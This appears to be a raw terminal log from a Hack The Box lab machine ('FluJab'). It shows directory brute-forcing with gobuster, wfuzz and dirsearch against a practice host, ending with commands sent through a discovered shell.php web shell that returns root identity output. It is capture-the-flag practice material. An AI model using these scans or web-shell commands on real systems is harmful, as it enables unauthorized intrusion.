  2660. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  2661.  
  2662.  
  2663.  
  2664. </head>
  2665. <body>
  2666.   <div id="cf-wrapper">
  2667.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  2668.     <div id="cf-error-details" class="cf-error-details-wrapper">
  2669.       <div class="cf-wrapper cf-header cf-error-overview">
  2670.         <h1>
  2671.           <span class="cf-error-type" data-translate="error">Error</span>
  2672.           <span class="cf-error-code">1003</span>
  2673.           <small class="heading-ray-id">Ray ID: f6d85b7d56758e4e
  2674.  • 2018-12-20 00:41:12 GMT
  2675. </small>
  2676.         </h1>
  2677.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  2678.       </div><!-- /.header -->
  2679.  
  2680.       <section></section><!-- spacer -->
  2681.  
  2682.       <div class="cf-section cf-wrapper">
  2683.         <div class="cf-columns two">
  2684.           <div class="cf-column">
  2685.             <h2 data-translate="what_happened">What happened?</h2>
  2686.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  2687.          </div>
  2688.  
  2689.          
  2690.          <div class="cf-column">
  2691.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  2692.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  2693.          </div>
  2694.          
  2695.        </div>
  2696.      </div><!-- /.section -->
  2697.  
  2698.      <div class="cf-error-footer cf-wrapper">
  2699.  <p>
  2700.    <span class="cf-footer-item">ClownWare Ray ID: <strong>b6690300803a2688
  2701. </strong></span>
  2702.    <span class="cf-footer-separator">•</span>
  2703.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  2704.    <span class="cf-footer-separator">•</span>
  2705.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  2706.    
  2707.  </p>
  2708. </div><!-- /.error-footer -->
  2709.  
  2710.  
  2711.    </div><!-- /#cf-error-details -->
  2712.  </div><!-- /#cf-wrapper -->
  2713.  
  2714.  <script type="text/javascript">
  2715.  window._cf_translation = {};
  2716.  
  2717.  
  2718. </script>
  2719.  
  2720.  
  2721.  
  2722. * Closing connection 0
  2723. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2724. root@kali:~/HTB/FluJab# gobuster -k -fw -u https://custoomercare.megabank.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,txt,htm,html,phtml,js,zip,rar,tar
  2725.  
  2726. =====================================================
  2727. Gobuster v2.0.0              OJ Reeves (@TheColonial)
  2728. =====================================================
  2729. [+] Mode         : dir
  2730. [+] Url/Domain   : https://custoomercare.megabank.htb/
  2731. [+] Threads      : 10
  2732. [+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  2733. [+] Status codes : 200,204,301,302,307,403
  2734. [+] Expanded     : true
  2735. [+] Timeout      : 10s
  2736. =====================================================
  2737. 2018/12/31 17:24:58 Starting gobuster
  2738. =====================================================
  2739. 2018/12/31 17:24:59 [-] Wildcard response found: https://custoomercare.megabank.htb/70573970-1eae-407d-97fd-1db5734270bd => 301
  2740. https://custoomercare.megabank.htb/12 (Status: 301)
  2741. https://custoomercare.megabank.htb/warez (Status: 301)
  2742. https://custoomercare.megabank.htb/news (Status: 301)
  2743. https://custoomercare.megabank.htb/2006 (Status: 301)
  2744. https://custoomercare.megabank.htb/serial (Status: 301)
  2745. https://custoomercare.megabank.htb/download (Status: 301)
  2746. https://custoomercare.megabank.htb/index (Status: 301)
  2747. https://custoomercare.megabank.htb/full (Status: 301)
  2748. https://custoomercare.megabank.htb/images (Status: 301)
  2749. https://custoomercare.megabank.htb/crack (Status: 301)
  2750. https://custoomercare.megabank.htb/search (Status: 301)
  2751. https://custoomercare.megabank.htb/contact (Status: 301)
  2752. https://custoomercare.megabank.htb/privacy (Status: 301)
  2753. https://custoomercare.megabank.htb/spacer (Status: 301)
  2754. https://custoomercare.megabank.htb/about (Status: 301)
  2755. https://custoomercare.megabank.htb/11 (Status: 301)
  2756. https://custoomercare.megabank.htb/logo (Status: 301)
  2757. https://custoomercare.megabank.htb/blog (Status: 301)
  2758. https://custoomercare.megabank.htb/new (Status: 301)
  2759. https://custoomercare.megabank.htb/10 (Status: 301)
  2760. https://custoomercare.megabank.htb/products (Status: 301)
  2761. https://custoomercare.megabank.htb/faq (Status: 301)
  2762. https://custoomercare.megabank.htb/rss (Status: 301)
  2763. https://custoomercare.megabank.htb/cgi-bin (Status: 301)
  2764. https://custoomercare.megabank.htb/2005 (Status: 301)
  2765. https://custoomercare.megabank.htb/home (Status: 301)
  2766. https://custoomercare.megabank.htb/img (Status: 301)
  2767. https://custoomercare.megabank.htb/sitemap (Status: 301)
  2768. https://custoomercare.megabank.htb/default (Status: 301)
  2769. https://custoomercare.megabank.htb/archives (Status: 301)
  2770. https://custoomercare.megabank.htb/09 (Status: 301)
  2771. https://custoomercare.megabank.htb/01 (Status: 301)
  2772. https://custoomercare.megabank.htb/links (Status: 301)
  2773. https://custoomercare.megabank.htb/1 (Status: 301)
  2774. https://custoomercare.megabank.htb/07 (Status: 301)
  2775. https://custoomercare.megabank.htb/06 (Status: 301)
  2776. https://custoomercare.megabank.htb/08 (Status: 301)
  2777. https://custoomercare.megabank.htb/2 (Status: 301)
  2778. https://custoomercare.megabank.htb/login (Status: 301)
  2779. https://custoomercare.megabank.htb/articles (Status: 301)
  2780. https://custoomercare.megabank.htb/05 (Status: 301)
  2781. https://custoomercare.megabank.htb/keygen (Status: 301)
  2782. https://custoomercare.megabank.htb/support (Status: 301)
  2783. https://custoomercare.megabank.htb/article (Status: 301)
  2784. https://custoomercare.megabank.htb/04 (Status: 301)
  2785. https://custoomercare.megabank.htb/help (Status: 301)
  2786. https://custoomercare.megabank.htb/events (Status: 301)
  2787. https://custoomercare.megabank.htb/03 (Status: 301)
  2788. https://custoomercare.megabank.htb/archive (Status: 301)
  2789. https://custoomercare.megabank.htb/register (Status: 301)
  2790. https://custoomercare.megabank.htb/forum (Status: 301)
  2791. https://custoomercare.megabank.htb/02 (Status: 301)
  2792. https://custoomercare.megabank.htb/en (Status: 301)
  2793. https://custoomercare.megabank.htb/software (Status: 301)
  2794. https://custoomercare.megabank.htb/downloads (Status: 301)
  2795. https://custoomercare.megabank.htb/3 (Status: 301)
  2796. https://custoomercare.megabank.htb/main (Status: 301)
  2797. https://custoomercare.megabank.htb/security (Status: 301)
  2798. https://custoomercare.megabank.htb/content (Status: 301)
  2799. https://custoomercare.megabank.htb/category (Status: 301)
  2800. https://custoomercare.megabank.htb/13 (Status: 301)
  2801. https://custoomercare.megabank.htb/4 (Status: 301)
  2802. https://custoomercare.megabank.htb/14 (Status: 301)
  2803. https://custoomercare.megabank.htb/15 (Status: 301)
  2804. https://custoomercare.megabank.htb/press (Status: 301)
  2805. https://custoomercare.megabank.htb/media (Status: 301)
  2806. https://custoomercare.megabank.htb/templates (Status: 301)
  2807. https://custoomercare.megabank.htb/profile (Status: 301)
  2808. https://custoomercare.megabank.htb/info (Status: 301)
  2809. https://custoomercare.megabank.htb/2004 (Status: 301)
  2810. https://custoomercare.megabank.htb/icons (Status: 301)
  2811. https://custoomercare.megabank.htb/resources (Status: 301)
  2812. https://custoomercare.megabank.htb/services (Status: 301)
  2813. https://custoomercare.megabank.htb/16 (Status: 301)
  2814. https://custoomercare.megabank.htb/18 (Status: 301)
  2815. https://custoomercare.megabank.htb/contactus (Status: 301)
  2816. https://custoomercare.megabank.htb/docs (Status: 301)
  2817. https://custoomercare.megabank.htb/html (Status: 301)
  2818. https://custoomercare.megabank.htb/features (Status: 301)
  2819. https://custoomercare.megabank.htb/files (Status: 301)
  2820. https://custoomercare.megabank.htb/5 (Status: 301)
  2821. https://custoomercare.megabank.htb/20 (Status: 301)
  2822. https://custoomercare.megabank.htb/21 (Status: 301)
  2823. https://custoomercare.megabank.htb/22 (Status: 301)
  2824. https://custoomercare.megabank.htb/page (Status: 301)
  2825. https://custoomercare.megabank.htb/6 (Status: 301)
  2826. https://custoomercare.megabank.htb/misc (Status: 301)
  2827. https://custoomercare.megabank.htb/19 (Status: 301)
  2828. https://custoomercare.megabank.htb/partners (Status: 301)
  2829. https://custoomercare.megabank.htb/i (Status: 301)
  2830. https://custoomercare.megabank.htb/27 (Status: 301)
  2831. https://custoomercare.megabank.htb/17 (Status: 301)
  2832. https://custoomercare.megabank.htb/23 (Status: 301)
  2833. https://custoomercare.megabank.htb/24 (Status: 301)
  2834. https://custoomercare.megabank.htb/2007 (Status: 301)
  2835. https://custoomercare.megabank.htb/26 (Status: 301)
  2836. https://custoomercare.megabank.htb/terms (Status: 301)
  2837. https://custoomercare.megabank.htb/top (Status: 301)
  2838. https://custoomercare.megabank.htb/9 (Status: 301)
  2839. https://custoomercare.megabank.htb/legal (Status: 301)
  2840. https://custoomercare.megabank.htb/banners (Status: 301)
  2841. https://custoomercare.megabank.htb/xml (Status: 301)
  2842. https://custoomercare.megabank.htb/29 (Status: 301)
  2843. https://custoomercare.megabank.htb/30 (Status: 301)
  2844. https://custoomercare.megabank.htb/28 (Status: 301)
  2845. https://custoomercare.megabank.htb/7 (Status: 301)
  2846. https://custoomercare.megabank.htb/tools (Status: 301)
  2847. https://custoomercare.megabank.htb/projects (Status: 301)
  2848. https://custoomercare.megabank.htb/user (Status: 301)
  2849. https://custoomercare.megabank.htb/25 (Status: 301)
  2850. https://custoomercare.megabank.htb/themes (Status: 301)
  2851. https://custoomercare.megabank.htb/0 (Status: 301)
  2852. https://custoomercare.megabank.htb/forums (Status: 301)
  2853. https://custoomercare.megabank.htb/feed (Status: 301)
  2854. https://custoomercare.megabank.htb/linux (Status: 301)
  2855. https://custoomercare.megabank.htb/jobs (Status: 301)
  2856. https://custoomercare.megabank.htb/8 (Status: 301)
  2857. https://custoomercare.megabank.htb/business (Status: 301)
  2858. https://custoomercare.megabank.htb/video (Status: 301)
  2859. https://custoomercare.megabank.htb/reviews (Status: 301)
  2860. https://custoomercare.megabank.htb/email (Status: 301)
  2861. https://custoomercare.megabank.htb/books (Status: 301)
  2862. https://custoomercare.megabank.htb/banner (Status: 301)
  2863. https://custoomercare.megabank.htb/research (Status: 301)
  2864. https://custoomercare.megabank.htb/view (Status: 301)
  2865. https://custoomercare.megabank.htb/graphics (Status: 301)
  2866. https://custoomercare.megabank.htb/print (Status: 301)
  2867. https://custoomercare.megabank.htb/feedback (Status: 301)
  2868. https://custoomercare.megabank.htb/2003 (Status: 301)
  2869. https://custoomercare.megabank.htb/pdf (Status: 301)
  2870. https://custoomercare.megabank.htb/ads (Status: 301)
  2871. https://custoomercare.megabank.htb/modules (Status: 301)
  2872. https://custoomercare.megabank.htb/company (Status: 301)
  2873. https://custoomercare.megabank.htb/blank (Status: 301)
  2874. https://custoomercare.megabank.htb/pub (Status: 301)
  2875. https://custoomercare.megabank.htb/copyright (Status: 301)
  2876. https://custoomercare.megabank.htb/games (Status: 301)
  2877. https://custoomercare.megabank.htb/common (Status: 301)
  2878. https://custoomercare.megabank.htb/site (Status: 301)
  2879. https://custoomercare.megabank.htb/people (Status: 301)
  2880. https://custoomercare.megabank.htb/comments (Status: 301)
  2881. https://custoomercare.megabank.htb/product (Status: 301)
  2882. https://custoomercare.megabank.htb/sports (Status: 301)
  2883. https://custoomercare.megabank.htb/buttons (Status: 301)
  2884. https://custoomercare.megabank.htb/logos (Status: 301)
  2885. https://custoomercare.megabank.htb/aboutus (Status: 301)
  2886. https://custoomercare.megabank.htb/story (Status: 301)
  2887. https://custoomercare.megabank.htb/english (Status: 301)
  2888. https://custoomercare.megabank.htb/image (Status: 301)
  2889. https://custoomercare.megabank.htb/uploads (Status: 301)
  2890. https://custoomercare.megabank.htb/31 (Status: 301)
  2891. https://custoomercare.megabank.htb/subscribe (Status: 301)
  2892. https://custoomercare.megabank.htb/gallery (Status: 301)
  2893. https://custoomercare.megabank.htb/careers (Status: 301)
  2894. https://custoomercare.megabank.htb/atom (Status: 301)
  2895. https://custoomercare.megabank.htb/stats (Status: 301)
  2896. https://custoomercare.megabank.htb/blogs (Status: 301)
  2897. https://custoomercare.megabank.htb/newsletter (Status: 301)
  2898. https://custoomercare.megabank.htb/music (Status: 301)
  2899. https://custoomercare.megabank.htb/publications (Status: 301)
  2900. https://custoomercare.megabank.htb/pages (Status: 301)
  2901. https://custoomercare.megabank.htb/technology (Status: 301)
  2902. https://custoomercare.megabank.htb/calendar (Status: 301)
  2903. https://custoomercare.megabank.htb/stories (Status: 301)
  2904. https://custoomercare.megabank.htb/photos (Status: 301)
  2905. https://custoomercare.megabank.htb/community (Status: 301)
  2906. https://custoomercare.megabank.htb/papers (Status: 301)
  2907. https://custoomercare.megabank.htb/data (Status: 301)
  2908. https://custoomercare.megabank.htb/arrow (Status: 301)
  2909. https://custoomercare.megabank.htb/submit (Status: 301)
  2910. https://custoomercare.megabank.htb/history (Status: 301)
  2911. https://custoomercare.megabank.htb/www (Status: 301)
  2912. https://custoomercare.megabank.htb/s (Status: 301)
  2913. https://custoomercare.megabank.htb/header (Status: 301)
  2914. https://custoomercare.megabank.htb/wiki (Status: 301)
  2915. https://custoomercare.megabank.htb/library (Status: 301)
  2916. https://custoomercare.megabank.htb/web (Status: 301)
  2917. https://custoomercare.megabank.htb/education (Status: 301)
  2918. https://custoomercare.megabank.htb/internet (Status: 301)
  2919. https://custoomercare.megabank.htb/in (Status: 301)
  2920. https://custoomercare.megabank.htb/advertise (Status: 301)
  2921. https://custoomercare.megabank.htb/go (Status: 301)
  2922. https://custoomercare.megabank.htb/b (Status: 301)
  2923. https://custoomercare.megabank.htb/a (Status: 301)
  2924. https://custoomercare.megabank.htb/spam (Status: 301)
  2925. https://custoomercare.megabank.htb/nav (Status: 301)
  2926. https://custoomercare.megabank.htb/mail (Status: 301)
  2927. https://custoomercare.megabank.htb/users (Status: 301)
  2928. https://custoomercare.megabank.htb/Images (Status: 301)
  2929. https://custoomercare.megabank.htb/topics (Status: 301)
  2930. https://custoomercare.megabank.htb/members (Status: 301)
  2931. https://custoomercare.megabank.htb/disclaimer (Status: 301)
  2932. https://custoomercare.megabank.htb/store (Status: 301)
  2933. https://custoomercare.megabank.htb/feeds (Status: 301)
  2934. https://custoomercare.megabank.htb/clear (Status: 301)
  2935. https://custoomercare.megabank.htb/2002 (Status: 301)
  2936. https://custoomercare.megabank.htb/awards (Status: 301)
  2937. https://custoomercare.megabank.htb/c (Status: 301)
  2938. https://custoomercare.megabank.htb/Default (Status: 301)
  2939. https://custoomercare.megabank.htb/dir (Status: 301)
  2940. https://custoomercare.megabank.htb/general (Status: 301)
  2941. https://custoomercare.megabank.htb/pics (Status: 301)
  2942. https://custoomercare.megabank.htb/signup (Status: 301)
  2943. https://custoomercare.megabank.htb/solutions (Status: 301)
  2944. https://custoomercare.megabank.htb/News (Status: 301)
  2945. https://custoomercare.megabank.htb/index2 (Status: 301)
  2946. https://custoomercare.megabank.htb/map (Status: 301)
  2947. https://custoomercare.megabank.htb/weblog (Status: 301)
  2948. https://custoomercare.megabank.htb/de (Status: 301)
  2949. https://custoomercare.megabank.htb/doc (Status: 301)
  2950. https://custoomercare.megabank.htb/public (Status: 301)
  2951. https://custoomercare.megabank.htb/shop (Status: 301)
  2952. https://custoomercare.megabank.htb/contacts (Status: 301)
  2953. https://custoomercare.megabank.htb/travel (Status: 301)
  2954. https://custoomercare.megabank.htb/list (Status: 301)
  2955. https://custoomercare.megabank.htb/viewtopic (Status: 301)
  2956. https://custoomercare.megabank.htb/fr (Status: 301)
  2957. https://custoomercare.megabank.htb/homepage (Status: 301)
  2958. https://custoomercare.megabank.htb/button (Status: 301)
  2959. https://custoomercare.megabank.htb/pixel (Status: 301)
  2960. https://custoomercare.megabank.htb/overview (Status: 301)
  2961. https://custoomercare.megabank.htb/documents (Status: 301)
  2962. https://custoomercare.megabank.htb/tips (Status: 301)
  2963. https://custoomercare.megabank.htb/adclick (Status: 301)
  2964. https://custoomercare.megabank.htb/contact_us (Status: 301)
  2965. https://custoomercare.megabank.htb/catalog (Status: 301)
  2966. https://custoomercare.megabank.htb/wp-content (Status: 301)
  2967. https://custoomercare.megabank.htb/us (Status: 301)
  2968. https://custoomercare.megabank.htb/movies (Status: 301)
  2969. https://custoomercare.megabank.htb/staff (Status: 301)
  2970. https://custoomercare.megabank.htb/hardware (Status: 301)
  2971. https://custoomercare.megabank.htb/wireless (Status: 301)
  2972. https://custoomercare.megabank.htb/p (Status: 301)
  2973. https://custoomercare.megabank.htb/global (Status: 301)
  2974. https://custoomercare.megabank.htb/screenshots (Status: 301)
  2975. https://custoomercare.megabank.htb/apps (Status: 301)
  2976. https://custoomercare.megabank.htb/version (Status: 301)
  2977. https://custoomercare.megabank.htb/mobile (Status: 301)
  2978. https://custoomercare.megabank.htb/other (Status: 301)
  2979. https://custoomercare.megabank.htb/directory (Status: 301)
  2980. https://custoomercare.megabank.htb/tech (Status: 301)
  2981. https://custoomercare.megabank.htb/online (Status: 301)
  2982. https://custoomercare.megabank.htb/advertising (Status: 301)
  2983. https://custoomercare.megabank.htb/welcome (Status: 301)
  2984. https://custoomercare.megabank.htb/admin (Status: 301)
  2985. https://custoomercare.megabank.htb/t (Status: 301)
  2986. https://custoomercare.megabank.htb/policy (Status: 301)
  2987. https://custoomercare.megabank.htb/2001 (Status: 301)
  2988. https://custoomercare.megabank.htb/faqs (Status: 301)
  2989. https://custoomercare.megabank.htb/link (Status: 301)
  2990. https://custoomercare.megabank.htb/releases (Status: 301)
  2991. https://custoomercare.megabank.htb/member (Status: 301)
  2992. https://custoomercare.megabank.htb/training (Status: 301)
  2993. https://custoomercare.megabank.htb/space (Status: 301)
  2994. https://custoomercare.megabank.htb/join (Status: 301)
  2995. https://custoomercare.megabank.htb/static (Status: 301)
  2996. https://custoomercare.megabank.htb/health (Status: 301)
  2997. https://custoomercare.megabank.htb/weather (Status: 301)
  2998. https://custoomercare.megabank.htb/reports (Status: 301)
  2999. https://custoomercare.megabank.htb/scripts (Status: 301)
  3000. https://custoomercare.megabank.htb/browse (Status: 301)
  3001. https://custoomercare.megabank.htb/windows (Status: 301)
  3002. https://custoomercare.megabank.htb/showallsites (Status: 301)
  3003. https://custoomercare.megabank.htb/programs (Status: 301)
  3004. https://custoomercare.megabank.htb/EWbutton_Community (Status: 301)
  3005. https://custoomercare.megabank.htb/FireFox_Reco (Status: 301)
  3006. https://custoomercare.megabank.htb/EWbutton_GuestBook (Status: 301)
  3007. https://custoomercare.megabank.htb/menu (Status: 301)
  3008. https://custoomercare.megabank.htb/EuropeMirror (Status: 301)
  3009. https://custoomercare.megabank.htb/entertainment (Status: 301)
  3010. https://custoomercare.megabank.htb/2000 (Status: 301)
  3011. https://custoomercare.megabank.htb/Home (Status: 301)
  3012. https://custoomercare.megabank.htb/newsletters (Status: 301)
  3013. https://custoomercare.megabank.htb/pr (Status: 301)
  3014. https://custoomercare.megabank.htb/32 (Status: 301)
  3015. https://custoomercare.megabank.htb/categories (Status: 301)
  3016. https://custoomercare.megabank.htb/assets (Status: 301)
  3017. https://custoomercare.megabank.htb/detail (Status: 301)
  3018. https://custoomercare.megabank.htb/strona_11 (Status: 301)
  3019. https://custoomercare.megabank.htb/strona_14 (Status: 301)
  3020. https://custoomercare.megabank.htb/strona_6 (Status: 301)
  3021. https://custoomercare.megabank.htb/strona_2 (Status: 301)
  3022. https://custoomercare.megabank.htb/36 (Status: 301)
  3023. https://custoomercare.megabank.htb/strona_8 (Status: 301)
  3024. https://custoomercare.megabank.htb/strona_1 (Status: 301)
  3025. https://custoomercare.megabank.htb/strona_18 (Status: 301)
  3026. https://custoomercare.megabank.htb/strona_3 (Status: 301)
  3027. https://custoomercare.megabank.htb/strona_4 (Status: 301)
  3028. https://custoomercare.megabank.htb/strona_16 (Status: 301)
  3029. https://custoomercare.megabank.htb/strona_17 (Status: 301)
  3030. https://custoomercare.megabank.htb/strona_7 (Status: 301)
  3031. https://custoomercare.megabank.htb/strona_9 (Status: 301)
  3032. https://custoomercare.megabank.htb/strona_5 (Status: 301)
  3033. https://custoomercare.megabank.htb/strona_15 (Status: 301)
  3034. https://custoomercare.megabank.htb/strona_10 (Status: 301)
  3035. https://custoomercare.megabank.htb/strona_12 (Status: 301)
  3036. https://custoomercare.megabank.htb/registration (Status: 301)
  3037. https://custoomercare.megabank.htb/strona_13 (Status: 301)
  3038. https://custoomercare.megabank.htb/strona_21 (Status: 301)
  3039. https://custoomercare.megabank.htb/strona_19 (Status: 301)
  3040. https://custoomercare.megabank.htb/strona_20 (Status: 301)
  3041. https://custoomercare.megabank.htb/40 (Status: 301)
  3042. https://custoomercare.megabank.htb/glossary (Status: 301)
  3043. https://custoomercare.megabank.htb/showthread (Status: 301)
  3044. https://custoomercare.megabank.htb/kontakt (Status: 301)
  3045. https://custoomercare.megabank.htb/mailman (Status: 301)
  3046. https://custoomercare.megabank.htb/cnt (Status: 301)
  3047. https://custoomercare.megabank.htb/order (Status: 301)
  3048. https://custoomercare.megabank.htb/tutorials (Status: 301)
  3049. https://custoomercare.megabank.htb/network (Status: 301)
  3050. https://custoomercare.megabank.htb/r (Status: 301)
  3051. https://custoomercare.megabank.htb/listinfo (Status: 301)
  3052. https://custoomercare.megabank.htb/35 (Status: 301)
  3053. https://custoomercare.megabank.htb/33 (Status: 301)
  3054. https://custoomercare.megabank.htb/whitepapers (Status: 301)
  3055. https://custoomercare.megabank.htb/privacy_policy (Status: 301)
  3056. https://custoomercare.megabank.htb/footer (Status: 301)
  3057. https://custoomercare.megabank.htb/audio (Status: 301)
  3058. https://custoomercare.megabank.htb/politics (Status: 301)
  3059. https://custoomercare.megabank.htb/it (Status: 301)
  3060. https://custoomercare.megabank.htb/37 (Status: 301)
  3061. https://custoomercare.megabank.htb/d (Status: 301)
  3062. https://custoomercare.megabank.htb/php (Status: 301)
  3063. https://custoomercare.megabank.htb/eng (Status: 301)
  3064. https://custoomercare.megabank.htb/text (Status: 301)
  3065. https://custoomercare.megabank.htb/podcasts (Status: 301)
  3066. https://custoomercare.megabank.htb/post (Status: 301)
  3067. https://custoomercare.megabank.htb/39 (Status: 301)
  3068. https://custoomercare.megabank.htb/chat (Status: 301)
  3069. https://custoomercare.megabank.htb/34 (Status: 301)
  3070. https://custoomercare.megabank.htb/science (Status: 301)
  3071. https://custoomercare.megabank.htb/nl (Status: 301)
  3072. https://custoomercare.megabank.htb/adview (Status: 301)
  3073. https://custoomercare.megabank.htb/x (Status: 301)
  3074. https://custoomercare.megabank.htb/account (Status: 301)
  3075. https://custoomercare.megabank.htb/intro (Status: 301)
  3076. https://custoomercare.megabank.htb/FAQ (Status: 301)
  3077. https://custoomercare.megabank.htb/comment (Status: 301)
  3078. ^C
  3079. [!] Keyboard interrupt detected, terminating.
  3080. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/viewforum: context canceled
  3081. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/forms: context canceled
  3082. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/dot: context canceled
  3083. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/affiliates: context canceled
  3084. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/uk: context canceled
  3085. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/corporate: context canceled
  3086. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/privacypolicy: context canceled
  3087. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/42: context canceled
  3088. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/sponsors: context canceled
  3089. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/testimonials: context canceled
  3090. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/donate: context canceled
  3091. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/flash: context canceled
  3092. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/upload: context canceled
  3093. 2018/12/31 17:25:07 [!] Get https://custoomercare.megabank.htb/node: context canceled
  3094. =====================================================
  3095. 2018/12/31 17:25:07 Finished
  3096. =====================================================
  3097. root@kali:~/HTB/FluJab# wfuzz -X GET -c --hc 301 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://custoomercare.megabank.htb/FUZZ.php
  3098.  
  3099. Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
  3100.  
  3101. ********************************************************
  3102. * Wfuzz 2.3.1 - The Web Fuzzer                         *
  3103. ********************************************************
  3104.  
  3105. Target: http://custoomercare.megabank.htb/FUZZ.php
  3106. Total requests: 220560
  3107.  
  3108. ==================================================================
  3109. ID   Response   Lines      Word         Chars          Payload    
  3110. ==================================================================
  3111.  
  3112.  
  3113. Total time: 390.3030
  3114. Processed Requests: 220560
  3115. Filtered Requests: 220560
  3116. Requests/sec.: 565.0993
  3117.  
  3118. root@kali:~/HTB/FluJab#
  3119.  
  3120. root@kali:~/HTB/FluJab# dirsearch -u https://custoomercare.megabank.htb -e php,txt,htm,html
  3121.  
  3122.  _|. _ _  _  _  _ _|_    v0.3.8
  3123. (_||| _) (/_(_|| (_| )
  3124.  
  3125. Extensions: php, txt, htm, html | Threads: 10 | Wordlist size: 7020
  3126.  
  3127. Error Log: /opt/dirsearch/logs/errors-18-12-31_17-36-24.log
  3128.  
  3129. Target: https://custoomercare.megabank.htb
  3130.  
  3131. [17:36:24] Starting:
  3132. [17:36:24] 400 -  166B  - /%2e%2e/google.com
  3133. [17:36:37] 200 -  521B  - /index.php
  3134. [17:36:42] 200 -   49B  - /shell.php
  3135.  
  3136. Task Completed
  3137. root@kali:~/HTB/FluJab# curl -k -v https://custoomercare.megabank.htb/shell.php
  3138. *   Trying 10.10.10.144...
  3139. * TCP_NODELAY set
  3140. * Connected to custoomercare.megabank.htb (10.10.10.144) port 443 (#0)
  3141. * ALPN, offering h2
  3142. * ALPN, offering http/1.1
  3143. * successfully set certificate verify locations:
  3144. *   CAfile: none
  3145.   CApath: /etc/ssl/certs
  3146. * (304) (OUT), TLS handshake, Client hello (1):
  3147. * (304) (IN), TLS handshake, Server hello (2):
  3148. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  3149. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  3150. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  3151. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  3152. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  3153. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  3154. * TLSv1.2 (IN), TLS handshake, Finished (20):
  3155. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  3156. * ALPN, server accepted to use http/1.1
  3157. * Server certificate:
  3158. *  subject: CN=ClownWare.htb; ST=LON; C=UK; emailAddress=bozo@clownware.htb; O=ClownWare Ltd; OU=ClownWare Protection Services
  3159. *  start date: Nov 28 14:57:03 2018 GMT
  3160. *  expire date: Nov 27 14:57:03 2023 GMT
  3161. *  issuer: CN=ClownWare Certificate Authority; ST=LON; C=UK; emailAddress=bozo@clownware.htb; O=ClownWare Ltd.; OU=ClownWare Protection Services
  3162. *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
  3163. > GET /shell.php HTTP/1.1
  3164. > Host: custoomercare.megabank.htb
  3165. > User-Agent: curl/7.61.0
  3166. > Accept: */*
  3167. >
  3168. < HTTP/1.1 200 OK
  3169. < Date: Thu, 20 Dec 2018 00:55:45 GMT
  3170. < Content-Type: text/html; charset=UTF-8
  3171. < Transfer-Encoding: chunked
  3172. < Connection: keep-alive
  3173. < Server: ClownWare Proxy
  3174. <
  3175.  
  3176. <!--
  3177. 53cret 5shell
  3178. shell.php?cmd=[commands]
  3179. -->
  3180. * Connection #0 to host custoomercare.megabank.htb left intact
  3181. root@kali:~/HTB/FluJab#
  3182. root@kali:~/HTB/FluJab# curl -k -X GET https://custoomercare.megabank.htb/shell.php -d 'cmd=id'
  3183.  
  3184. <!--
  3185. 53cret 5shell
  3186. shell.php?cmd=[commands]
  3187. -->
  3188. root@kali:~/HTB/FluJab# curl -k -X GET https://custoomercare.megabank.htb/shell.php -p 'cmd=id'
  3189.  
  3190. <!--
  3191. 53cret 5shell
  3192. shell.php?cmd=[commands]
  3193. -->
  3194. curl: (6) Could not resolve host: cmd=id
  3195. root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=id"
  3196. <!DOCTYPE html>
  3197. <html>
  3198.     <head>
  3199.         <title>MASTERHACKERZ ONLY!!</title>
  3200.         <style type="text/css">
  3201.        body {
  3202.         background-color: #000;
  3203.         color: green;
  3204.         text-indent: 50px;
  3205.         font-size: 1.5em;
  3206.        }
  3207.  
  3208.        img {
  3209.               width: 55%;
  3210.               height: auto;
  3211.        }
  3212.  
  3213.     </style>
  3214. <body>
  3215. <pre>
  3216. <center>
  3217. <H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
  3218. --------------------------------------------------------------
  3219.  
  3220. uid=0(root) gid=0(root) groups=0(root)
  3221.  
  3222. </center>
  3223. </pre>
  3224. </body>root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=pwd"
  3225. <!DOCTYPE html>
  3226. <html>
  3227.     <head>
